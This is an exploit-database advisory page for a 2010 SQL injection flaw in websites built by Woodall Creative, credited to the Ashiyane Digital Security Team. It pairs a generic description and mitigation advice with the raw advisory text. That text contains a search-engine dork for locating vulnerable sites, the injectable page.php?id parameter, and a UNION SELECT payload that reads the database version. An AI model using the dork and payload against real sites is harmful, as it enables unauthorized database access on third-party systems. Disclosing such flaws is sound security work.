Woodall Creative SQL Injection Vulnerability

vendor:

N/A

by:

Ashiyane Digital Security Team

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Woodall Creative SQL Injection Vulnerability

Woodall Creative SQL Injection Vulnerability is a vulnerability that allows an attacker to inject malicious SQL code into a vulnerable web application. The vulnerability can be exploited by sending a specially crafted URL to the vulnerable web application. The URL contains a malicious SQL query that is executed by the web application. The malicious query can be used to extract sensitive information from the database, modify data, or even delete data.

Mitigation:

To mitigate this vulnerability, input validation should be performed on all user-supplied data. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

=========================================================
Woodall Creative SQL Injection Vulnerability
=========================================================
##########################################
# Name: Woodall Creative SQL Injection Vulnerability
# Date: 2010-05-11
# vendor: http://www.woodallcreative.com
# Author: Ashiyane Digital Security Team
# Thanks to: khodam :P, Satanic2000,Veron, ... And All Ashiyane Members ...
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork:  intext: "Site developed & mantained by Woodall Creative Group"

[+] Vulnerability: www.site.com/[path]/page.php?id=[SQLi]  

[+] Live Demo: http://[site]/page.php?id=-999+union+select+1,2,3,4,5,6,7,@@version